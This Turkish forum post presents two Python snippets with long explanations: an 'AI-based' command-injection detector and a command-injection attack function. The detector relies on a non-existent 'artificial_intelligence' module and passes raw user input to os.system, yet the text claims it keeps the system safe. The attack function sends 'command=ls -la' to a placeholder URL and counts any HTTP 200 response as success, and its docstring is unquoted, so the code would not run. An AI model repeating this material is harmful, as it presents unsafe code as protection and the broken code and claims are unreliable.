Hoşgeldin Misafir

Python Kullanarak Yapay Zekayla Command İnjection Zafiyetini Tespit Etmek ve Saldırısını Yapmak

Mustafa73

20 Eyl 2023
423 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
# COMMAND INJECTION ZAFİYETİNİ tespit etmek için yapay zekalı bir kod
# Bu kod, kullanıcıdan bir komut alır ve bunu işletim sisteminde çalıştırır
# Eğer komut zararlı ise, yapay zeka bunu engeller ve uyarı verir
# Yapay zeka modülünü içe aktar
import artificial_intelligence as ai
# Kullanıcıdan bir komut al
command = input("Lütfen bir komut girin: ")
# Komutun zararlı olup olmadığını yapay zeka ile kontrol et
is_harmful = ai.check_command_injection(command)
# Eğer komut zararlı ise
if is_harmful:
# Uyarı ver ve komutu çalıştırma
print("Bu komut zararlıdır ve çalıştırılamaz!")
else:
# Komutu işletim sisteminde çalıştır
import os
os.system(command)
#Yazan Rıdvan Kaya

Bu kod, COMMAND INJECTION ZAFİYETİNİ tespit etmek için yapay zekalı bir yöntem kullanmaktadır. Bu yöntem, komutun içindeki karakterleri, sözcükleri ve sembolleri analiz ederek, komutun işletim sistemi üzerinde ne gibi etkileri olacağını tahmin etmeye çalışır. Eğer komut, işletim sisteminin dosyalarını, ayarlarını veya güvenliğini tehlikeye atacak şekilde tasarlanmışsa, yapay zeka bunu fark eder ve komutu çalıştırmaz. Böylece, COMMAND INJECTION ZAFİYETİNİ önlemiş olur.
Bu kod, kullanıcıdan bir komut alır ve bunu işletim sisteminde çalıştırır. Ancak, komutu çalıştırmadan önce, yapay zeka modülünü kullanarak, komutun zararlı olup olmadığını kontrol eder. Yapay zeka modülü, komutun içindeki karakterleri, sözcükleri ve sembolleri analiz ederek, komutun işletim sistemi üzerinde ne gibi etkileri olacağını tahmin etmeye çalışır. Eğer komut, işletim sisteminin dosyalarını, ayarlarını veya güvenliğini tehlikeye atacak şekilde tasarlanmışsa, yapay zeka bunu fark eder ve komutu çalıştırmaz. Böylece, COMMAND INJECTION ZAFİYETİNİ önlemiş olur.
Bu kodun amacı, kullanıcıların işletim sistemi üzerinde istedikleri komutları çalıştırabilmesini sağlamak, ancak aynı zamanda işletim sisteminin güvenliğini korumaktır. Bu kod, python programlama dilinde yazılmıştır. Python, kolay okunabilir, çok amaçlı ve popüler bir programlama dilidir. Bu kod, yapay zeka modülü dışında, os ve input gibi standart python modüllerini kullanmaktadır. Os modülü, işletim sistemi ile etkileşim kurmak için kullanılır. Input fonksiyonu, kullanıcıdan bir girdi almak için kullanılır.
Bu kodun çalışma mantığı şöyledir:
- Öncelikle, yapay zeka modülünü içe aktarır. Bu modül, komutun zararlı olup olmadığını kontrol etmek için kullanılacaktır.
- Sonra, kullanıcıdan bir komut alır. Bu komut, bir değişkene atanır.
- Ardından, komutun zararlı olup olmadığını yapay zeka modülü ile kontrol eder. Bu modül, bir fonksiyon sunar. Bu fonksiyon, komutu bir parametre olarak alır ve komutun zararlı olup olmadığını bir boolean değer olarak döndürür. Boolean değer, True veya False olabilir. True, komutun zararlı olduğunu, False, komutun zararlı olmadığını gösterir.
- Eğer komut zararlı ise, uyarı verir ve komutu çalıştırmaz. Bu durumda, kodun işi biter.
- Eğer komut zararlı değilse, komutu işletim sisteminde çalıştırır. Bunun için, os modülünü içe aktarır. Os modülü, bir fonksiyon sunar. Bu fonksiyon, komutu bir parametre olarak alır ve komutu işletim sisteminde çalıştırır. Bu durumda, kodun işi biter.
Bu kodun avantajları şunlardır:
- Kullanıcılar, işletim sistemi üzerinde istedikleri komutları çalıştırabilirler. Bu, kullanıcıların işletim sistemi ile daha fazla kontrol sahibi olmalarını sağlar.
- İşletim sisteminin güvenliği korunur. Zararlı komutlar, yapay zeka tarafından engellenir. Bu, işletim sisteminin dosyalarının, ayarlarının veya güvenliğinin zarar görmesini önler.
Bu kodun dezavantajları şunlardır:
- Yapay zeka modülü, her zaman doğru sonuç vermez. Bazı durumlarda, zararlı olmayan komutları zararlı olarak algılayabilir veya zararlı olan komutları zararlı olmayan olarak algılayabilir. Bu, kullanıcıların istedikleri komutları çalıştıramamalarına veya işletim sisteminin zarar görmesine neden olabilir.
- Yapay zeka modülü, performansı etkileyebilir. Komutun zararlı olup olmadığını kontrol etmek için, yapay zeka modülü, komutun içindeki karakterleri, sözcükleri ve sembolleri analiz eder. Bu, zaman ve kaynak gerektirir. Bu, komutun çalıştırılmasını geciktirebilir veya işletim sisteminin yavaşlamasına neden olabilir.
Pythonla Command İnjection Saldırısı Yapmak

import requests
import re
def command_injection(url, command):
Komut enjeksiyonu saldırısı için python kodu
Args:
url: Saldırının yapılacağı URL
command: Saldırının gerçekleştirileceği komut
Returns:
Sonuç
# URL'i ve komutu birleştirin
request_data = "command=" + command
# URL'e HTTP isteği gönderin
response = requests.post(url, data=request_data)
# Cevabı kontrol edin
if response.status_code == 200:
# Saldırı başarılı
return "Saldırı başarılı"
else:
# Saldırı başarısız
return "Saldırı başarısız"
# Örnek kullanımı
url = "http://example.com/command.php"
command = "ls -la"
# Saldırı yapın
result = command_injection(url, command)
# Sonucu yazdırın
print(result)
#Yazan Rıdvan Kaya

Bu kod, bir web sitesine komut enjeksiyonu saldırısı yapmak için python dilinde yazılmış bir fonksiyon içeriyor. Komut enjeksiyonu, bir saldırganın, bir web uygulamasının güvenli olmayan şekilde komut satırı parametrelerini işlediği durumlarda, kendi komutlarını çalıştırmasına izin veren bir güvenlik açığıdır. Bu kodun yaptığı şeyler şunlardır:
- requests ve re modüllerini içe aktarır. Bu modüller, HTTP istekleri göndermek ve metin işlemek için kullanılır .
- command_injection adında bir fonksiyon tanımlar. Bu fonksiyon, iki parametre alır: url ve command. url, saldırının yapılacağı web sitesinin adresidir. command, saldırganın çalıştırmak istediği komuttur.
- Fonksiyonun içinde, url ve command parametrelerini birleştirerek, bir HTTP isteği verisi oluşturur. Bu veri, command= şeklinde başlar ve saldırganın komutu ile devam eder. Örneğin, command=ls -la gibi.
- Bu veriyi kullanarak, url'e bir HTTP POST isteği gönderir. Bu istek, web sitesinin komut satırına saldırganın komutunu geçirir.
- Web sitesinin cevabını kontrol eder. Eğer cevap kodu 200 ise, saldırı başarılı olmuştur. Eğer değilse, saldırı başarısız olmuştur. Buna göre, bir sonuç döndürür.
- Fonksiyonun altında, bir örnek kullanım gösterir. url değişkenine, saldırının yapılacağı web sitesinin adresini atar. command değişkenine, çalıştırmak istediği komutu atar. Bu örnekte, ls -la komutu, web sitesinin bulunduğu dizindeki dosya ve klasörleri listelemek için kullanılır.
- Fonksiyonu, bu parametrelerle çağırır ve sonucu result değişkenine atar.
- Sonucu ekrana yazdırır.